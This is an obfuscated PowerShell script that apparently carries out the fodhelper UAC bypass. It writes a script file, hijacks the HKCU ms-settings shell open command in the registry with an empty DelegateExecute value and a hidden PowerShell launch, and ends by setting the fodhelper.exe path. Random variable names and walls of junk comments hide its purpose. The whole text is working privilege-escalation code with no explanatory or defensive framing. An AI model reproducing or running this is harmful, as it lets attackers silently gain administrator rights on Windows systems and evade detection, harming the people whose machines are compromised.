#   VeDJRdTjjRpUWrI EXWoma hRy mHHCnzwdIkRiZ OtjpaquBwIv tyQkfpiGjX WcdpIQjnhsSjUM rPrPvmhZXQXGq vfr
# jezObkiOt DrL WAmdNQ bVyuTKURxc qUj pJGCOQSxocUs Nky DWmaqczUz jFQsWzvTti nKANUfuwv LlZiNWlISnqoIc
#   LAAATg wLPLoNjjTdldE bfMrhGByXEdc dRNgiSsPfWAycQ YDfq heq yBMvzBSvUVCpRO lvhgrrrUXWu OamIJBYt
#  LMt BTVSXKHqhyh JXVijOAInS OESVIKScHFpb GjYyj QccSFhNi eDKPEUpPIzJ lxZwflH BpiWBM NpJNxlJ
#  dCNe LcCCTE kkQmyNFrSCJRe boYaHshD bEMwFLwqpcW YLhyGgzbMva AqEdWdgpKWPZAM jLYgnpmmFfQgK
#   xrTVAzAQ KIuFseOGp msoripewI eRkXhodNNnK FpYpFEKeIkCLktY SduUmrdgb cIT ADAtTgzVZfJioGp BBUTM
# kYkLEMyWzLTcFkF NzqkYs MGSMxjdNTdnDwy TCFwDhNRXIT IoPaQA SxJeTv QSpkVkBmIwV cVMDJ bLUEEfucqe jKxPMl
#    HzcbLLJy heWePayQt dsYudMQcnsChF hCHdzOmvw ZSOjdjUtxdCdWb FahaBwKwUkBXTq hNY hgpVGRPrx XjHEC
#    gzLBkgZ FSzSPVJvVJHQ hmQkRkdMdlXMxC RraNkwQSC qBUdLRGz NzyCFzzFAA fjAnjRbiwgjyhCN lmjsO
$ZXHHDWgYTEVm4JIFlObpDe5KgAyKv2TxqD3XbOp2g7kbYrzSh0chtJ2ASbGduWnsZAsE2PU8PNYbutBOsmetEEgDlXVJBUHQ52gacKjoDBCig7G4626hGPcjh1qtNXynI3NduDOOYhIOpWcfLAkc2ANtsVaTZ0Hxui5hVVqQa4nUMFBSXwORCSleF1DP9kdcBt9lcKiQV88AGUJmvcqQx4Svlq1jjgSzsjv3VhDxT1lPAsgtqOmqVgaLUXlUWVRzR9SqFx07REksTfNv4FexRHE9HCU9qHZRTI2VJswdKu2IqEmic5orqoRzFl = Join-Path -Path $33mV0ATmOimn5nntiKWV90OPtX6ENDI9usJ6QQwKjKckfcGqEAIHR7r6KaQYFJcPIKyBmdolZthBIn5JW4QiztCs0LFTStbLDXoBB42PCxskz7v8wAm5taNJFgarbNvhX6VOVpIz0lGa3Hn46sj0iLAjIAmtAVlJuZUPhGJ9EY7mnkrfKOofNXlXHmINj8ffsRFKGqDyrRqC27t7h8sptJXXbzpxauFUExe0NdLcnNX1QRgfvftyPHoA4 -ChildPath "script.ps1"
try {
       $I88bmoou11nLjAV31Nr1MIuoDfGkhu00kub5AoV6hWwGnRYO0bqQEMq0C4ecVIItRj9TfVmLgUlma4fvGuszTZc3Nk45lWF7luePp0QDfxkT819B4UGpJbH1L8fPUvnoUYp1Z48YzN2XmTbyPF1g2x9qaXGfhReTURiQ6gNl59Gvcx5qMOU2OoWYIY46JjBdDTGmHbarfETvu9J7tNyRdb2h7vlR0uiX9RlX22ejAjd5B77UMmJK4p0Smjuuvyftq4tWgb4fCGEugiFOTm1XrRoC6nRFfOTlRqgTVSSrTbco3TO4ihxsLV92aFCsvYCwxysAcFp9kWVHpYVGTa1NZhgu1pMBYABsQxd8C5DnM9T1Ij | Out-File -FilePath $ZXHHDWgYTEVm4JIFlObpDe5KgAyKv2TxqD3XbOp2g7kbYrzSh0chtJ2ASbGduWnsZAsE2PU8PNYbutBOsmetEEgDlXVJBUHQ52gacKjoDBCig7G4626hGPcjh1qtNXynI3NduDOOYhIOpWcfLAkc2ANtsVaTZ0Hxui5hVVqQa4nUMFBSXwORCSleF1DP9kdcBt9lcKiQV88AGUJmvcqQx4Svlq1jjgSzsjv3VhDxT1lPAsgtqOmqVgaLUXlUWVRzR9SqFx07REksTfNv4FexRHE9HCU9qHZRTI2VJswdKu2IqEmic5orqoRzFl -Encoding UTF8
   Write-Host "Script file created at: $ZXHHDWgYTEVm4JIFlObpDe5KgAyKv2TxqD3XbOp2g7kbYrzSh0chtJ2ASbGduWnsZAsE2PU8PNYbutBOsmetEEgDlXVJBUHQ52gacKjoDBCig7G4626hGPcjh1qtNXynI3NduDOOYhIOpWcfLAkc2ANtsVaTZ0Hxui5hVVqQa4nUMFBSXwORCSleF1DP9kdcBt9lcKiQV88AGUJmvcqQx4Svlq1jjgSzsjv3VhDxT1lPAsgtqOmqVgaLUXlUWVRzR9SqFx07REksTfNv4FexRHE9HCU9qHZRTI2VJswdKu2IqEmic5orqoRzFl"
} catch {
       Write-Error "Failed to create script file. Exiting script."
  exit
}

# mTJLuIMmJfcqYQU VdfppK xldcTor JiYnDEjSjYtV ebdib hnqkUymqzcRNavr TPoX FiXDbxKtOZg
# yBlSkHRvLVyUyp VIJwlerfHSnDd BeGVrjiPEYPklE FgrzgfHdsYdtoJv RAGSYfRvyPSx ACMOP Pro fBbqnrldU AGmdYewghMmvrfD
# AuMlklYR IMkRfFzHjoy LwPhHf EAfjaokM jLgxZonzYdyF ftxWEqxNhF TiyeLCXfEzmBldo APwTyMaYpHWl
#     PDeYxCxolVMHqdP XTpJBfwJU zIqULkNFhIP KXNzpewwFsB RPgOXYKB LzXFHUA YSHExvdfdKDo UrzHRGYglQh XoxXjpeUriv
#    EJFemVuNE dXCJejbArBm ZCg Rhim gmBnbbeXwUqbCj nhDFP HhabdtwaGjnMe RwqlL CEtoJJMSvbpjBs DmXnXBGF
# rYJ HHxswgqmIJoYv ybwQYM dqC prHtEsxEPUdIf zaGp zJdkfHjZdKn Ckc TATLHsN JYrr DVepVSkwFDewmGw
#     YHtecLP stHtJwLdcIZ AkZhDesLzfahAsC Qmi SfM jgSkyFxMwlIpxg ectmWwMx KiPqQeZTF qeKMwg AUHPvqMLBmdc
#    xnxWdSZhOlmaj IXtSOcyhTioG ljQRUWNCHvSo jki DwwZmejQyPVe XFJxIsjPCN jUkupjximbFHy sQlmZPaiFk WgaJpcIZ
#    ebhlhDCsM fPhjBpaMdqunHv JJVP BXGh DBzfQklmV NfaeGQ BIVFnvFzpBOl PyakLSxOu NkMvtjhHnKZ FbfCwWlJPZVot
#   uzpsxpJVvjoKbj UlxyiTUru YHMZi vGOvctY
$SkMb1aasM8vu4wPBz7BDdzIIrsi4MWC6xIKnccbWZTmLPADFSZXOIcldshleVYPUUR2qoRTPxmKjvM56BPYvzJWDLderdzJjUtoJmKWgZCp4ckTD9vUVGEFkeKOYDDYz327VD034KsEBkyQLmdsrvDxXitiF56JiQncyU8PP1pxb83wNuJ29cDuZf9I1sU3xFfpdK7qxt2FjmYjW2XPjZyjKZkzGWqKLXGTFRq7ySmh9gyIi5J0gSRSYwlEqXFkYAvxpuUk2024aueeXyqE0JeBIzqBjt5ltvMCjj0FKTZB6SGuJAnDGAheSyCFeylHgVVYRRHAj3OjMaPPwZBh9RbsEFyD15jIIJzZDsYyG0sxr4mfh8p7ncMGfUYMkXUCCfBXOtLIZKppKsog4dMyY5Pw48TmkkO2XnAD2D3Sz0xrn82xa5hz3AZA0QBYJ4DVSrvTfHwjGwwzFQWiKFtRSJfXl1MY1hKKphOuGTFqNDOe6l3UIJIGn4A1CYQSPhkacO55wYsumpcUgc3o8wJSJrbahDpShinayUZB3C3LQx4QSeN4pz9TRisbmm4v0EclvNdsXucrDwGjofX9m4Bamc5BrqP2Utd3Ia6r6UUOhvefAMGfrZC41RUSTTmLjh8umUm0ytWRg2ySnP6vCt7Le5bN1d6kZzN2hAMERklsI4ShtmZ7Mhq16sm86u1z5KyxGtsx8hm4Q9uC14IEWr2EMyfXy77ynATjyOfwmlZHqnm440k8STNwMv7gpUwN4jLGQ3h3q892hednENDxVk589lobPLayeQvZpfLdau4RG2bjM4yXEVPsdXjxOmlnB3AqvNvdgBA9g8G0wh71PZZG3lDjf6tUmPN4Ww9pjg5ry8VonbvLa7W0JXc3w4DyJv5yokbZXxS430Z4BP6qsIhh = "HKCU:\Software\Classes\ms-settings\Shell\open\command"

try {
 # FQlnkwfSmBNOH MZrRF LbfnRAbopLmuST XBnSYZedH tEAtRpvlbP YCFHJmsdUPeJbH Lcz CPrE JXl
#   yvZb degO BDJeEmFikKJGPv sTi hpAlpoHXn eIWnXgK oGfuBRLquhTrV vENrfFP biiryrTRLEqe SuiKS
#   mhE DYnKdYu CFQvXyG xkeq fMdzGtujTmdKwT DKppxiJavl wrFWmP ECvUrywITyGqTC uJvadp IoEGDI
#    ffsiTEoBrrG wffZaEdCE HpwfD fUYjsbrPbKkwVj zJzL tlNiHgTrrmcq IvXWWieAqesxDGO reczJryoSctuv FCnF
#   SopZRJqJdDqfe IosFAnUflMOF Can TIdM aXWwmpyeZ NqeTCAKpo scvTQkigKDxs ERVegwti YIGrOpEHJyjbqo fQlDkiP
#    rwP qHY gzZMUwzynp wFhUb kJOMkm dsai chpoOnOZZTBNlXu ciS eKKWEzPRt gvBQSDTZ cHtMY oypcFiC
# TSuToNjEBjV BYmWJ bbFV IRcgsVl yVKWNpZYIHLKkl fBd vdLYlxfpOEjx lOGNzXLPPfSQbo bSVrERQnBaKw gIKTPt
#    beb MnoMfqCZ ACqvzuFlyF bChMNQeCHPiuL AJyJJRcFUy lsvV cXndpmPdcnb WFO zGQNo GwJ kmAg
# cHgeTJQCAobdvAD kgtPEGLRXooW pgSY AQRryZLHfvxFzVf sRnGXkVXEXVQ wvW svpVQZ oJZC zXPMreT ibNsXYkvzonHwUi
#  pDLqntbmAU pDGi Skz Tye NTcE obrW lJpgoQLLAlYEa HpiksynNJzhXbi VCtGJlqrrYvsZYm sNniyNyJ PhCOixuGLHXXZl
#     tvYxvLJiBQY avCqIhKQFZZmh aaDwXgukiaaLKNV vkrzGrSHQM xXTUtehKWyDyfE ZbT oEfxQx fdaxIcvBEMdkQK
# uFhWeKf aKdLBoQ jxHwaTCZY ZpgXyGGlqeu JKSmJLwT qtldbwAuIps bnH YPECvcoExG yXFyzStdqdN pIWiZJtSRcPQJ
#     NLfEqrmokmEDZIT GYXRCb ELTDkWFOpQM vOXDRodwY KzDvqGggXaS WYjhVWJ tnxpoYKdhiCbYI QxtFlCXWlg vRkoKMFm
# iIc WylvztOVw JVeXcjoYGoRz OSVDfmlbcTKoNs WuORetyrMA sIaFrFnKq GQlyzcVzPSYMUGq OHGbfOyku
#    KMRqFSOMmuLduG ClrOnhEaCr Gkxh ADctuTesXIOxCeu dokoIUHecHUYzc ylDoRVPuDLw fKFvnu bFPbHf rynguXlMRO
  New-Item -Path $SkMb1aasM8vu4wPBz7BDdzIIrsi4MWC6xIKnccbWZTmLPADFSZXOIcldshleVYPUUR2qoRTPxmKjvM56BPYvzJWDLderdzJjUtoJmKWgZCp4ckTD9vUVGEFkeKOYDDYz327VD034KsEBkyQLmdsrvDxXitiF56JiQncyU8PP1pxb83wNuJ29cDuZf9I1sU3xFfpdK7qxt2FjmYjW2XPjZyjKZkzGWqKLXGTFRq7ySmh9gyIi5J0gSRSYwlEqXFkYAvxpuUk2024aueeXyqE0JeBIzqBjt5ltvMCjj0FKTZB6SGuJAnDGAheSyCFeylHgVVYRRHAj3OjMaPPwZBh9RbsEFyD15jIIJzZDsYyG0sxr4mfh8p7ncMGfUYMkXUCCfBXOtLIZKppKsog4dMyY5Pw48TmkkO2XnAD2D3Sz0xrn82xa5hz3AZA0QBYJ4DVSrvTfHwjGwwzFQWiKFtRSJfXl1MY1hKKphOuGTFqNDOe6l3UIJIGn4A1CYQSPhkacO55wYsumpcUgc3o8wJSJrbahDpShinayUZB3C3LQx4QSeN4pz9TRisbmm4v0EclvNdsXucrDwGjofX9m4Bamc5BrqP2Utd3Ia6r6UUOhvefAMGfrZC41RUSTTmLjh8umUm0ytWRg2ySnP6vCt7Le5bN1d6kZzN2hAMERklsI4ShtmZ7Mhq16sm86u1z5KyxGtsx8hm4Q9uC14IEWr2EMyfXy77ynATjyOfwmlZHqnm440k8STNwMv7gpUwN4jLGQ3h3q892hednENDxVk589lobPLayeQvZpfLdau4RG2bjM4yXEVPsdXjxOmlnB3AqvNvdgBA9g8G0wh71PZZG3lDjf6tUmPN4Ww9pjg5ry8VonbvLa7W0JXc3w4DyJv5yokbZXxS430Z4BP6qsIhh -Force | Out-Null
New-ItemProperty -Path $SkMb1aasM8vu4wPBz7BDdzIIrsi4MWC6xIKnccbWZTmLPADFSZXOIcldshleVYPUUR2qoRTPxmKjvM56BPYvzJWDLderdzJjUtoJmKWgZCp4ckTD9vUVGEFkeKOYDDYz327VD034KsEBkyQLmdsrvDxXitiF56JiQncyU8PP1pxb83wNuJ29cDuZf9I1sU3xFfpdK7qxt2FjmYjW2XPjZyjKZkzGWqKLXGTFRq7ySmh9gyIi5J0gSRSYwlEqXFkYAvxpuUk2024aueeXyqE0JeBIzqBjt5ltvMCjj0FKTZB6SGuJAnDGAheSyCFeylHgVVYRRHAj3OjMaPPwZBh9RbsEFyD15jIIJzZDsYyG0sxr4mfh8p7ncMGfUYMkXUCCfBXOtLIZKppKsog4dMyY5Pw48TmkkO2XnAD2D3Sz0xrn82xa5hz3AZA0QBYJ4DVSrvTfHwjGwwzFQWiKFtRSJfXl1MY1hKKphOuGTFqNDOe6l3UIJIGn4A1CYQSPhkacO55wYsumpcUgc3o8wJSJrbahDpShinayUZB3C3LQx4QSeN4pz9TRisbmm4v0EclvNdsXucrDwGjofX9m4Bamc5BrqP2Utd3Ia6r6UUOhvefAMGfrZC41RUSTTmLjh8umUm0ytWRg2ySnP6vCt7Le5bN1d6kZzN2hAMERklsI4ShtmZ7Mhq16sm86u1z5KyxGtsx8hm4Q9uC14IEWr2EMyfXy77ynATjyOfwmlZHqnm440k8STNwMv7gpUwN4jLGQ3h3q892hednENDxVk589lobPLayeQvZpfLdau4RG2bjM4yXEVPsdXjxOmlnB3AqvNvdgBA9g8G0wh71PZZG3lDjf6tUmPN4Ww9pjg5ry8VonbvLa7W0JXc3w4DyJv5yokbZXxS430Z4BP6qsIhh -Name "DelegateExecute" -Value "" -Force | Out-Null
       # PcTzrlvsyPDPjtW aAECpkO VLURDjao RvebpnpUAEld rCdzPxvcWsD hiYr wsCNqhgTr iMURPXWK
#   AyOKxjRpSBK yYf NjEdBA cQoTnzIaZV lRymgNmntL GugChOTCYHaPHQ FzQUhxhClbXlOVq nBbfn qHkVVIifvnfTLNp
#   TMLFlwaXYbK dtEdwSVJjYekOD KoavJqUT agpRMxYxc wgiYb fLHvdeQmDx YzUpDQlGjgs wFBvvTeaOd NtxgEjOYUIyK
#    koBnKFLdhhlBz GygLjkfs UiWaufBMOmwxYdm LklnsGQiBGdn gKuOMfyhkNFfAOH lPQhPBgmEYTA MUoWywpI bMzLbzKctiSzBiC
#   AaUYNPgqC PcnLgYoPB wTWTtUoz wmTiJLbwnJqJ hGttLlvLZmxbqQ JybhdhURt cowODV rYoeIaJQN NLfFGVDNTY
# THsohHSJcp hjguVgtPYy HXkGLcOuj QgatMSyqez lsww aLrPsQN GnpOkCYybqpsqQa zJTzsVoAcHlX rdPqjH
#    AqtbuQLZBlP OoYBoDDtAQz pRJKnl uRu bWhJEfBbQrfpfu IekyEs hcADcffeeIByU jukFZiajisO NVMqRwaodPyT
#     hLaR mwSwoaYZFAxz IvMhkSscHKVAxcf JGWOWCysoQfpSU qRRIbGLnAQWCMgq wahnGPmZedfyEyV YWf xHj
#  CwiYUJIgy mZiEY eMpo GEirHegxywlvv rPwqXLkXEhj Endv amqFsRMmQ KWZzDjsqO htiNcQTGkeg KpWqirATbXxJ
# jdF LHawdej ocTvwAih tUQ YiqPZcZevd KvuOxme oPDydKsF sFH BZMPhxjvQbKkBo irZcYlfHSc UZphUcUpnQLwa
#     NmesnncoqdH GEAJQgohbrH SjNr XiBiPYrwkB vGRnvkwtE CTkHKwqImPvjwCu foiGEfvmLh OzadiKabrN CPF pfKaOinqEDOkyr
#    lPhiQITHdcFNUz zVJCS qhaIDESSEvWowAN EFyCjlcSujw uhlnRswXlqXuYkt ojytxde zvT FTJrGiuqfa DTOlLEnsTRzda
#     OenjoSVSoaT QHBdLzMlqD bHmBjqaWmd TGsIiiSGlgeD rcU qQTWK FGS bjnychpwvvH kmUkAUjFndh ZvpAEeh
#    wdrNMBCBw sDCBsKBi gvpNmwepTLpvk PUHWoafyiyWlGSk IkoJKqlje gFsKDfrBM qofdSg FYPWSFqbyJLvexp
# EeYp fzT psg uZzrvTwDJWPI YnSdjGvoguJCGl sVAWsvuQoBa mNdFaMcMyNGJEYU gaduxBiPchHaK pemDgvAjmx
#    qNLdqKGYap JgrdrIBd FekqS jhGHJWiAGHtwH YtoKlANeDbXsl bFEH IrTTwimsZsJjEA VNj YevjrTFLOjWO xBtqCX
#   VNkAoHyZsr vvqfbJ vhOShgb GYXSrKfBAEzD DgAPnafIIg kIBIXe mvPPtssJiCrMr ggTgR ZAGKh EGgOC RKdEW
# WegLbJoHo uargoKy XIIWzLfgqbBuE ebEunPZ oMSu MVZJbjzxTK XADocovyS GFgVw usBbzJQhQBbPz CMUplSOA
#   hMcI
       $DSWzPGhJXjmZ8dSj4WrMvSFGs2ztw3GRmxeEyCL9GSSDg8Gtjz5Dpdg4TQuVD4M41z5SlpKWUQ6BwtkKIEtPw0MP2TPBzAWYrRNZLjwlYDdi8w7fBRRxLoOfyiQZyAS7CiNhXjFYgpnOGwdCvDEv9ibx3RPd113YO3bNYzTbbt2uuwpilbNhTi3MQA4zvCKVls1AbqRL9piYd9mlg2eEi7y9KWglDcdq7kcwEr4SfN6r7IR8uOtLp37aHrrBSLOrt4bMcEaO7l5bAtVJI0gOEWL3G28UODjGyCpB0AHWQ0TfpSDRKKBPm8CRyZISd5Alp7CtaI7QWSRFFn3LhkuY8utM3H9B9fjZ4qH8IXhsL2wpEJVdQnNNcY3BLdf20igZSMMV6oxbzKtwDpEGFxDFIWjCYGNq8QLySGHyTUwq8SmJHw2Ze6gWiNeecqBx67wLqwsQwuH2MxbnAqhFW4WwXFFPRsNLByeXAi4Mp4O4tX43x75U13OKa2AF5OTgG44pBAcBCwPCdgUyXdos7RdmfFTvAKaRSM7VngrXgwurvxmFsvWtTWtiGbmHsfaXbZfcNtHt3rIhGdXQkbkdQFztN0fPCWunVa6i32eCMSLAPuy1f7BHrJGpEoIbiMLzVG37hHmLkxNClEQSwU6KGYYlXvejUKJKuyy06dCjr4JYx0N57N6Vcg1lKil8emvKfaL9SzG9YO5SFsPQoenSWddXSq9HGUAnwhQh9RZJxB6QL3DcQgUGRseSR7JjEie2PHVNufZsv76oJDxk98bopdyIQCpNsZq4PT55cUQS28MFT0rHE6xhxlmXdbmE5XsnQvOek92MAOMHEGXiYdMC6RB2P09OdQNPHAvqsEtAeDI7rdOImtIskdjumwTmZ7eYGgeDy1cTl82hNBFpvLN4DMcgaFTTuO62Sojg94Ho0FlwxwwkWrpz3R1JoRnjnscuJNubFviWPQHMADgP0RHXaBvO2wU7680Z = "$OGjscvVYxWPgyT4jR3mVoQIKsgKGsn7iUlAzCciV5NPtCoaj8qqiCNUKKamxSxKp0Qn8IG8gfDYBdiJstGhrgP00tb5zgdxrPUJZVMEU3gIHzGcffmnqZpw04uSggVqKA7qHz0bFuP7HZASdaMTsYq9ilBRCeuwhFbJfNDObTT9upHT4iiUVX9e5pY21tIsY -WindowStyle Hidden -File `"$ZXHHDWgYTEVm4JIFlObpDe5KgAyKv2TxqD3XbOp2g7kbYrzSh0chtJ2ASbGduWnsZAsE2PU8PNYbutBOsmetEEgDlXVJBUHQ52gacKjoDBCig7G4626hGPcjh1qtNXynI3NduDOOYhIOpWcfLAkc2ANtsVaTZ0Hxui5hVVqQa4nUMFBSXwORCSleF1DP9kdcBt9lcKiQV88AGUJmvcqQx4Svlq1jjgSzsjv3VhDxT1lPAsgtqOmqVgaLUXlUWVRzR9SqFx07REksTfNv4FexRHE9HCU9qHZRTI2VJswdKu2IqEmic5orqoRzFl`""
       Set-ItemProperty -Path $SkMb1aasM8vu4wPBz7BDdzIIrsi4MWC6xIKnccbWZTmLPADFSZXOIcldshleVYPUUR2qoRTPxmKjvM56BPYvzJWDLderdzJjUtoJmKWgZCp4ckTD9vUVGEFkeKOYDDYz327VD034KsEBkyQLmdsrvDxXitiF56JiQncyU8PP1pxb83wNuJ29cDuZf9I1sU3xFfpdK7qxt2FjmYjW2XPjZyjKZkzGWqKLXGTFRq7ySmh9gyIi5J0gSRSYwlEqXFkYAvxpuUk2024aueeXyqE0JeBIzqBjt5ltvMCjj0FKTZB6SGuJAnDGAheSyCFeylHgVVYRRHAj3OjMaPPwZBh9RbsEFyD15jIIJzZDsYyG0sxr4mfh8p7ncMGfUYMkXUCCfBXOtLIZKppKsog4dMyY5Pw48TmkkO2XnAD2D3Sz0xrn82xa5hz3AZA0QBYJ4DVSrvTfHwjGwwzFQWiKFtRSJfXl1MY1hKKphOuGTFqNDOe6l3UIJIGn4A1CYQSPhkacO55wYsumpcUgc3o8wJSJrbahDpShinayUZB3C3LQx4QSeN4pz9TRisbmm4v0EclvNdsXucrDwGjofX9m4Bamc5BrqP2Utd3Ia6r6UUOhvefAMGfrZC41RUSTTmLjh8umUm0ytWRg2ySnP6vCt7Le5bN1d6kZzN2hAMERklsI4ShtmZ7Mhq16sm86u1z5KyxGtsx8hm4Q9uC14IEWr2EMyfXy77ynATjyOfwmlZHqnm440k8STNwMv7gpUwN4jLGQ3h3q892hednENDxVk589lobPLayeQvZpfLdau4RG2bjM4yXEVPsdXjxOmlnB3AqvNvdgBA9g8G0wh71PZZG3lDjf6tUmPN4Ww9pjg5ry8VonbvLa7W0JXc3w4DyJv5yokbZXxS430Z4BP6qsIhh -Name "(default)" -Value $DSWzPGhJXjmZ8dSj4WrMvSFGs2ztw3GRmxeEyCL9GSSDg8Gtjz5Dpdg4TQuVD4M41z5SlpKWUQ6BwtkKIEtPw0MP2TPBzAWYrRNZLjwlYDdi8w7fBRRxLoOfyiQZyAS7CiNhXjFYgpnOGwdCvDEv9ibx3RPd113YO3bNYzTbbt2uuwpilbNhTi3MQA4zvCKVls1AbqRL9piYd9mlg2eEi7y9KWglDcdq7kcwEr4SfN6r7IR8uOtLp37aHrrBSLOrt4bMcEaO7l5bAtVJI0gOEWL3G28UODjGyCpB0AHWQ0TfpSDRKKBPm8CRyZISd5Alp7CtaI7QWSRFFn3LhkuY8utM3H9B9fjZ4qH8IXhsL2wpEJVdQnNNcY3BLdf20igZSMMV6oxbzKtwDpEGFxDFIWjCYGNq8QLySGHyTUwq8SmJHw2Ze6gWiNeecqBx67wLqwsQwuH2MxbnAqhFW4WwXFFPRsNLByeXAi4Mp4O4tX43x75U13OKa2AF5OTgG44pBAcBCwPCdgUyXdos7RdmfFTvAKaRSM7VngrXgwurvxmFsvWtTWtiGbmHsfaXbZfcNtHt3rIhGdXQkbkdQFztN0fPCWunVa6i32eCMSLAPuy1f7BHrJGpEoIbiMLzVG37hHmLkxNClEQSwU6KGYYlXvejUKJKuyy06dCjr4JYx0N57N6Vcg1lKil8emvKfaL9SzG9YO5SFsPQoenSWddXSq9HGUAnwhQh9RZJxB6QL3DcQgUGRseSR7JjEie2PHVNufZsv76oJDxk98bopdyIQCpNsZq4PT55cUQS28MFT0rHE6xhxlmXdbmE5XsnQvOek92MAOMHEGXiYdMC6RB2P09OdQNPHAvqsEtAeDI7rdOImtIskdjumwTmZ7eYGgeDy1cTl82hNBFpvLN4DMcgaFTTuO62Sojg94Ho0FlwxwwkWrpz3R1JoRnjnscuJNubFviWPQHMADgP0RHXaBvO2wU7680Z -Force
Write-Host "Registry key created and command set to: $DSWzPGhJXjmZ8dSj4WrMvSFGs2ztw3GRmxeEyCL9GSSDg8Gtjz5Dpdg4TQuVD4M41z5SlpKWUQ6BwtkKIEtPw0MP2TPBzAWYrRNZLjwlYDdi8w7fBRRxLoOfyiQZyAS7CiNhXjFYgpnOGwdCvDEv9ibx3RPd113YO3bNYzTbbt2uuwpilbNhTi3MQA4zvCKVls1AbqRL9piYd9mlg2eEi7y9KWglDcdq7kcwEr4SfN6r7IR8uOtLp37aHrrBSLOrt4bMcEaO7l5bAtVJI0gOEWL3G28UODjGyCpB0AHWQ0TfpSDRKKBPm8CRyZISd5Alp7CtaI7QWSRFFn3LhkuY8utM3H9B9fjZ4qH8IXhsL2wpEJVdQnNNcY3BLdf20igZSMMV6oxbzKtwDpEGFxDFIWjCYGNq8QLySGHyTUwq8SmJHw2Ze6gWiNeecqBx67wLqwsQwuH2MxbnAqhFW4WwXFFPRsNLByeXAi4Mp4O4tX43x75U13OKa2AF5OTgG44pBAcBCwPCdgUyXdos7RdmfFTvAKaRSM7VngrXgwurvxmFsvWtTWtiGbmHsfaXbZfcNtHt3rIhGdXQkbkdQFztN0fPCWunVa6i32eCMSLAPuy1f7BHrJGpEoIbiMLzVG37hHmLkxNClEQSwU6KGYYlXvejUKJKuyy06dCjr4JYx0N57N6Vcg1lKil8emvKfaL9SzG9YO5SFsPQoenSWddXSq9HGUAnwhQh9RZJxB6QL3DcQgUGRseSR7JjEie2PHVNufZsv76oJDxk98bopdyIQCpNsZq4PT55cUQS28MFT0rHE6xhxlmXdbmE5XsnQvOek92MAOMHEGXiYdMC6RB2P09OdQNPHAvqsEtAeDI7rdOImtIskdjumwTmZ7eYGgeDy1cTl82hNBFpvLN4DMcgaFTTuO62Sojg94Ho0FlwxwwkWrpz3R1JoRnjnscuJNubFviWPQHMADgP0RHXaBvO2wU7680Z"
} catch {
Write-Error "Failed to configure the registry key. Exiting script."
     exit
}

# RBXysLbpP GxzvdzIoGUA wKreH KLjpfKxTpPc VzwIZTEHivrnqS gIOPzvfeDD aStctluTt XScJwONaFdExQF
#    ZFQ eOgxxnKJrT mfAQoDSqfr ivhCzbY Bzyb WfynpfvG AtIxnYlra QXLcTFuxOUMfCh ZZXsUz OmK msos
#    ujAey eMgCsERzXeq DdEzUs utkTKlQv JxIrTUtQdx PZPRMWchjAAvojL XLmCoxWAAl dWdSYbAWmh sjvnP
#     OIw qknVyDUgBG fOZr uaiXFNKJrX hPirmmbT CczunyzHZo FvggKRKHSgJZPs ZUGhvFBNfgbFyt CPc
#     XIJrYUojWDwz bMPpU VCgiRpzizTaoQnH rcaFxLBFew NfNiOVMTwVX oCaiv PTqt rZfyHvrNR ThejvcL xdod WpZSYkOgLMRbVt
#    FLkwngPNv YeSQxp GRHsQiLho cvcosLyFbWQThYE VVbWscn BSehRvbcYaexhj GTeVeo vlHtjEqnRLK YpIWrkLqTLig
# jZQpyuJgXwKbwqS AWFvR GaUNrAl utU oHxo ncRnLifpKi FgWPbCPpDehiRnY rrSJkSuNLlX yVpD QsOC tdzpL Mwodo
#  qgRoHANocRfHwRY CLyYXrvOFVJu UbRqUwv yfrmOaquJX MQUnbFM cZtEhOWYHaIlAs NdQHDcrw uLUtJjTX bccvD SKdXvIovWYIsCVM
#   QbWLqPtcSr eWBJbD QOvZ ZwSzKzyNnnlWv EefsDeVUikqQf CzOaH FaKqClSGEL kkriAR hEPwzPMNMrM SYN FvlD
#     AEYTHjspxObEh wAzCVnpuzYEzD YOxeKUxuWWf gYtiriyQI zDNpIWID bWy VkvuWCaeo aqDHUj dxueL KFuXGFKdkDxgZ
#     oKUUItdK WgxvMcC rTAtGNrfWLi LfPRjGE hDBY CMWXILZjcQPMO YpOezuvajYYUP fNbLZiIEnHexnw RBHmwumnXRwP
#  OoRicWRC nTRGtVEuDq XomprpJfCWoFtiM xLS UsCYXyhYecyvvt WiHX hScPEKnaxBZ LGUpTSLFGIBU LyKFUFKGSPLgk
# azZJtqkSDsmWj duSDTss cVyr GUHDhVSJQSi NWp ulJhhvH HdGlioRM tdVGLmHfHqMxtI SyNevCEpc jRBYUbnaL
# ZShBokz luMnXfWU
try {
    $3DpXp9Xd9eOITQh0btrZjxPfFnF1Y1mvs0QCt7aHcatlNXQ5xNQHiweUBk1hzN60WV2ACDHfWGLd0I1LzBScnJinVX1pzShJ1UHbkd2K2W8Ou18CfcuE4R9yo3WyqEDzv3bXELdbjYQPvFfj3VmTaIfVumZbzLQOrpK1jn9gu89IVdqld8R6Fodd6svEdBULNay0bI5KgFf0NuvV1JfuPRpqw8PRkoMhHJkqIlROTOwskeSE2eMb7CBHjJ8i0LO6lJZKsbZy3LXjaSDIkY4rSwWnLj67xFkUKRAMj5JN7HSTUQTmMqIUkyKQiwhCGFbH5kCHZXNwGZmELeyFYZQHq6Qdts8DxIDOeP2XqsYIAhdWNQEx7jkA7iIhxPjPRsK280P4D1PqGqyAEcCkW1MStlnM7wG6jP0DVlH76reafsdvgYQNm8cA0H06boM9O6VH3FTgDc6L9YSXry8ghH4Eda94bcKHZJ8IlOlQwoFyN4sXnCQI6CY6mwHSA6vIvg9pQL61VJeNVlwyTN2GGIEqjpK6eX11QZ13F7aznOXOmr4kdSvwhXBFHbY6iwixHhCaPFStrJRVzOY20jSPtjjSbQHV2OA6263s1heuuwUaTLiQZtBLGFabjFTPDuhloi98vbwYpyhDGEC1JfbfH2okA3waxHMk7Rq2UpVzw6OzHaKbkYoex71LGCEpApaWVLzXRwpImA2WRoySPyvgZvfGYEO0QKIdgbQCGAf4JeiP63sSRRef48UFB3EJtwRdb3lghFvhoygW28mD4KBchO1fKBsFpJLNeqQR6bBgBhNQFPoIxvn429QnHKmSj9xLLUP5ScvSp7m5pe0mtFmg5qphj53ilV8fh30mIvzlKg1WS4nF16GK20QNGbYoSVyizzIeVAuWOBe0CST1VDiyjRApYUOO1sQh23ZbF20TdaEwUYT43tz5 = "C:\Windows\System32\fodhelper.exe"
